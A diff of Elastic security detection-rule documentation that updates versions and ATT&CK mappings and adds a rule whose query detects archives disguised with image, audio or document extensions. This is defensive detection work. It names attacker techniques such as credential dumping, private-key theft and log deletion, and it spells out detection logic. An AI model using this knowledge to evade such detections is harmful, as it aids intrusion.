@@ -107,3 +108,23 @@ any where event.action == "Directory Service Access" and event.code == "4662" an ** Name: OS Credential Dumping ** ID: T1003 ** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Private Keys +** ID: T1552.004 +** Reference URL: https://attack.mitre.org/techniques/T1552/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc index 3cc8fa1a0b..c55fc27921 100644 --- a/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/account-discovery-command-via-system-account.asciidoc @@ -29,10 +29,11 @@ Identifies when the SYSTEM account uses an account discovery utility. This could * OS: Windows * Use Case: Threat Detection * Tactic: Discovery +* Tactic: Privilege Escalation * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -99,3 +100,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: System Owner/User Discovery ** ID: T1033 ** Reference URL: https://attack.mitre.org/techniques/T1033/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Local Accounts +** ID: T1078.003 +** Reference URL: https://attack.mitre.org/techniques/T1078/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc b/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc index b581885b31..a08c3c0601 100644 --- a/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/account-password-reset-remotely.asciidoc @@ -34,8 +34,9 @@ Identifies an attempt to reset a potentially privileged account password remotel * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Impact -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -78,3 +79,11 @@ sequence by winlog.computer_name with maxspan=5m ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Account Access Removal +** ID: T1531 +** Reference URL: https://attack.mitre.org/techniques/T1531/ diff --git a/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc b/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc index 28e8237bfc..f025155d26 100644 --- a/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/adding-hidden-file-attribute-via-attrib.asciidoc @@ -30,11 +30,12 @@ Adversaries can add the 'hidden' attribute to files to hide them from the user i * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Persistence * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -131,6 +132,14 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Hidden Files and Directories ** ID: T1564.001 ** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Windows File and Directory Permissions Modification +** ID: T1222.001 +** Reference URL: https://attack.mitre.org/techniques/T1222/001/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc index 4826df5ee9..956e8fcd74 100644 --- a/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adfind-command-activity.asciidoc @@ -41,7 +41,7 @@ This rule detects the Active Directory query tool, AdFind.exe. AdFind has legiti * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -138,3 +138,7 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Domain Trust Discovery ** ID: T1482 ** Reference URL: https://attack.mitre.org/techniques/T1482/ +* Technique: +** Name: System Network Configuration Discovery +** ID: T1016 +** Reference URL: https://attack.mitre.org/techniques/T1016/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc b/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc index ccbc7ea0c5..505e0d3ba5 100644 --- a/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/administrator-privileges-assigned-to-an-okta-group.asciidoc @@ -33,7 +33,7 @@ Detects when an administrator role is assigned to an Okta group. An adversary ma * Data Source: Okta * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc index b5639b4aed..7ab9be3397 100644 --- a/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/administrator-role-assigned-to-an-okta-user.asciidoc @@ -33,7 +33,7 @@ Identifies when an administrator role is assigned to an Okta user. An adversary * Use Case: Identity and Access Audit * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc b/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc index 42e3a3838c..57c3ce56af 100644 --- a/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adminsdholder-backdoor.asciidoc @@ -35,7 +35,7 @@ Detects modifications in the AdminSDHolder object. Attackers can abuse the SDPro * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 105 +*Version*: 106 *Rule authors*: 
@@ -60,3 +60,15 @@ event.action:"Directory Service Changes" and event.code:5136 and ** Name: Persistence ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc b/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc index 80db9b226f..6e06092359 100644 --- a/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adminsdholder-sdprop-exclusion-added.asciidoc @@ -36,7 +36,7 @@ Identifies a modification on the dsHeuristics attribute on the bit that holds th * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -107,3 +107,15 @@ any where event.action == "Directory Service Changes" and ** Name: Persistence ** ID: TA0003 ** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc b/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc index 83a90818c6..d572d80692 100644 
--- a/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/adobe-hijack-persistence.asciidoc @@ -36,7 +36,7 @@ Detects writing executable files that will be automatically launched by Adobe on * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -126,3 +126,7 @@ file where host.os.type == "windows" and event.type == "creation" and ** Name: Services File Permissions Weakness ** ID: T1574.010 ** Reference URL: https://attack.mitre.org/techniques/T1574/010/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc b/docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc new file mode 100644 index 0000000000..eda6e92242 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/archive-file-with-unusual-extension.asciidoc 
@@ -0,0 +1,83 @@ +[[archive-file-with-unusual-extension]] +=== Archive File with Unusual Extension + +Identifies the creation of an archive file with an unusual extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.action != "deletion" and + + /* common archive file headers - Rar, 7z, GZIP, MSCF, XZ, ZIP */ + file.Ext.header_bytes : ("52617221*", "377ABCAF271C*", "1F8B*", "4d534346*", "FD377A585A00*", "504B0304*", "504B0708*") and + + ( + /* common image file extensions */ + file.extension : ("jpg", "jpeg", "emf", "tiff", "gif", "png", "bmp", "ico", "fpx", "eps", "inf") or + + /* common audio and video file extensions */ + file.extension : ("mp3", "wav", "avi", "mpeg", "flv", "wma", "wmv", "mov", "mp4", "3gp") or + + /* common document file extensions */ + (file.extension : ("doc", "docx", "rtf", "ppt", "pptx", "xls", "xlsx") and + + /* exclude ZIP file header values for OPENXML documents */ + not file.Ext.header_bytes : ("504B0304*", "504B0708*")) + ) and + + not (process.executable : "?:\\Windows\\System32\\inetsrv\\w3wp.exe" and file.path : "?:\\inetpub\\temp\\IIS Temporary Compressed Files\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** 
Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Masquerade File Type +** ID: T1036.008 +** Reference URL: https://attack.mitre.org/techniques/T1036/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc b/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc index 763537c19f..d1564a4240 100644 --- a/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/at-exe-command-lateral-movement.asciidoc @@ -30,7 +30,7 @@ Identifies use of at.exe to interact with the task scheduler on remote hosts. Re * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -67,6 +67,10 @@ process where host.os.type == "windows" and event.type == "start" and process.na ** ID: T1053 ** Reference URL: https://attack.mitre.org/techniques/T1053/ * Sub-technique: +** Name: At +** ID: T1053.002 +** Reference URL: https://attack.mitre.org/techniques/T1053/002/ +* Sub-technique: ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc index bad38b1bb5..018da007f4 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-create-okta-api-token.asciidoc @@ -32,7 +32,7 @@ Detects attempts to create an Okta API token. An adversary may create an Okta AP * Data Source: Okta * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc index 898503d223..33e2435bfb 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-application.asciidoc @@ -33,7 +33,7 @@ Detects attempts to deactivate an Okta application. An adversary may attempt to * Data Source: Okta * Tactic: Impact -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc index b52414b13d..a7df47b956 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-network-zone.asciidoc @@ -34,7 +34,7 @@ Detects attempts to deactivate an Okta network zone. Okta network zones can be c * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc index c9b37d2eb4..37ed4ddd5c 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy-rule.asciidoc @@ -33,7 +33,7 @@ Detects attempts to deactivate a rule within an Okta policy. An adversary may at * Tactic: Defense Evasion * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc index 0f1f8602bd..fa96944dcd 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-an-okta-policy.asciidoc @@ -33,7 +33,7 @@ Detects attempts to deactivate an Okta policy. An adversary may attempt to deact * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc index 087e22d5a3..1f9a7dda8d 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-deactivate-mfa-for-an-okta-user-account.asciidoc @@ -32,7 +32,7 @@ Detects attempts to deactivate multi-factor authentication (MFA) for an Okta use * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc index dea09d6610..7c839d306b 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-application.asciidoc @@ -32,7 +32,7 @@ Detects attempts to delete an Okta application. An adversary may attempt to modi * Data Source: Okta * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc index 16cbe20f29..45b842e9dc 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-network-zone.asciidoc @@ -34,7 +34,7 @@ Detects attempts to delete an Okta network zone. Okta network zones can be confi * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc index 537facfad0..e3335aabdd 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy-rule.asciidoc @@ -33,7 +33,7 @@ Detects attempts to delete a rule within an Okta policy. An adversary may attemp * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc index 5c630f5786..5d7cf3fb7d 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-delete-an-okta-policy.asciidoc @@ -33,7 +33,7 @@ Detects attempts to delete an Okta policy. An adversary may attempt to delete an * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc index 3f7ff4da23..3700dab8e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-iptables-or-firewall.asciidoc @@ -29,7 +29,7 @@ Adversaries may attempt to disable the iptables or firewall service in an attemp * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc index 1a89e7c55c..5a81841dcd 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-disable-syslog-service.asciidoc @@ -32,7 +32,7 @@ Adversaries may attempt to disable the syslog service in an attempt to an attemp * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc index 20a3ee1150..574efdc398 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-application.asciidoc @@ -33,7 +33,7 @@ Detects attempts to modify an Okta application. An adversary may attempt to modi * Data Source: Okta * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: 
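Review bot: The `@@` context in the attempt-to-disable-syslog-service hunk reads "Adversaries may attempt to disable the syslog service in an attempt to an attemp", which shows the rule description contains a duplicated "in an attempt to" phrase. The hunk only bumps `*Version*: 106` to `107`, so the wording is not touched here; since these asciidoc pages are generated, the fix belongs in the source rule's description so it does not reappear on the next regeneration.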
diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc index b51a31959e..3502233fad 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-network-zone.asciidoc @@ -34,7 +34,7 @@ Detects attempts to modify an Okta network zone. Okta network zones can be confi * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc index 95b8e63743..d07bfb897c 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy-rule.asciidoc @@ -33,7 +33,7 @@ Detects attempts to modify a rule within an Okta policy. An adversary may attemp * Tactic: Defense Evasion * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc index 402017c624..67b47c287b 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-modify-an-okta-policy.asciidoc @@ -32,7 +32,7 @@ Detects attempts to modify an Okta policy. An adversary may attempt to modify an * Data Source: Okta * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc index ed1140b3ff..d8145ce50e 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-reset-mfa-factors-for-an-okta-user-account.asciidoc @@ -32,7 +32,7 @@ Detects attempts to reset an Okta user's enrolled multi-factor authentication (M * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc index dc732bbc73..188fcadad4 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempt-to-revoke-okta-api-token.asciidoc @@ -32,7 +32,7 @@ Identifies attempts to revoke an Okta API token. An adversary may attempt to rev * Data Source: Okta * Tactic: Impact -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc index 7bdf44c375..a827aebf32 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempted-bypass-of-okta-mfa.asciidoc @@ -32,7 +32,7 @@ Detects attempts to bypass Okta multi-factor authentication (MFA). An adversary * Use Case: Identity and Access Audit * Tactic: Credential Access -*Version*: 106 +*Version*: 207 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc index 8f1c202738..8cbfc09e3a 100644 --- a/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/attempts-to-brute-force-an-okta-user-account.asciidoc @@ -32,7 +32,7 @@ Identifies when an Okta user account is locked out 3 times within a 3 hour windo * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc index b1335b27fc..a07323325e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-created.asciidoc @@ -33,7 +33,7 @@ Identifies the creation of an AWS log trail that specifies the settings for deli * Use Case: Log Auditing * Tactic: Collection -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc index 6d14f0dab7..1101846b83 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-deleted.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of an AWS log trail. An adversary may delete trails in a * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc index b4c7e377d8..180831ac5b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-suspended.asciidoc @@ -34,7 +34,7 @@ Identifies suspending the recording of AWS API calls and log file delivery for t * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc index 3933af3e27..48da7776ca 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudtrail-log-updated.asciidoc @@ -34,7 +34,7 @@ Identifies an update to an AWS log trail setting that specifies the delivery of * Resources: Investigation Guide * Tactic: Impact -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc index 587e1c9713..78c56cf933 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-alarm-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies the deletion of an AWS CloudWatch alarm. An adversary may delete alar * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc index a68e9eec1f..f1057330e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-group-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of a specified AWS CloudWatch log group. When a log grou * Resources: Investigation Guide * Tactic: Impact -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc index f380f44fad..7c5151dfbb 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-cloudwatch-log-stream-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of an AWS CloudWatch log stream, which permanently delet * Tactic: Impact * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc index 558eb1ddc4..4fb0f0813b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-config-resource-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to delete an AWS Config Service resource. An adversary may t * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 